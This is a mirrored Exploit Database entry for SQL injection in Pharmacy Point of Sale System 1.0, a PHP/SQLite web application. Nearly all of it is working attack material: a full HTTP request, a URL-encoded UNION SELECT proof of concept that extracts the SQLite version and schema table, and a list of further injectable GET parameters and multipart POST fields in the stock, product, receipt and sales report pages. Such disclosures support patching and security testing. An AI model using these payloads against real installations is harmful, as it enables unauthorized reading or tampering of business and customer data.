Pharmacy Point of Sale System 1.0 – ‘Multiple’ SQL Injection (SQLi)

• Exploit Database
• 130 阅读

• 作者： Murat
  日期： 2021-09-30
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50357/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101

  # Exploit Title: Pharmacy Point of Sale System 1.0 - 'Multiple' SQL Injection (SQLi) # Date: 28.09.2021 # Exploit Author: Murat # Vendor Homepage: https://www.sourcecodester.com/php/14957/pharmacy-point-sale-system-using-php-and-sqlite-free-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/pharmacy.zip # Version: 1.0 # Tested on: Windows 10   # Pharmacy Point of Sale System v1.0 SQLi     GET /pharmacy/view_product.php?id=-1 HTTP/1.1 Host: localhost Cookie: PHPSESSID=5smfl8sfgemi1h9kdl2h3dsnd6 Sec-Ch-Ua: "Chromium";v="93", " Not;A Brand";v="99" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Connection: close     POC: https://localhost/pharmacy/view_product.php?id=2000110022%27+union+select+1%2c1%2c1%2c1%2c%28select%27SqLi%27%7c%7csubstr%28%28select+sqlite%5fversion%28%29%7c%7c%27%04%27%7c%7c%27sqlite%5fmaster%27%7c%7c%27%04%27%7c%7c%27anonymous%27%7c%7c%27%01%03%03%07%27%29%2c1%2c65536%29%29%2c1%2c1%2c1--   -----------------------------------------------------------------------   #Other parameters with sql injection vulnerability;     ==> /pharmacy/?date_from=&date_to=1'"&page=sales_report   ==> /pharmacy/?date_from=1'"&date_to=&page=sales_report   ==> /pharmacy/manage_stock.php?expiry_date=01/01/1967&id=-1'&product_id=1&quantity=1&supplier_id=1   ==> GET /pharmacy/view_receipt.php?id=1'"&view_only=true   ==> /pharmacy/manage_product.php?id=-1'   ==> POST /pharmacy/Actions.php?a=save_stock   ------------YWJkMTQzNDcw Content-Disposition: form-data; name="id"     ------------YWJkMTQzNDcw Content-Disposition: form-data; name="supplier_id"   1'" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="product_id"   2'" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="quantity"   1'" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="expiry_date"     ==> POST /pharmacy/Actions.php?a=save_product HTTP/1.1   ------------YWJkMTQzNDcw Content-Disposition: form-data; name="id"   5'" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="product_code"   94102'" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="category_id"   1'" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="name"   pHqghUme'" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="price"   1'" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="description"   1'" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="status"   0'" ------------YWJkMTQzNDcw-- -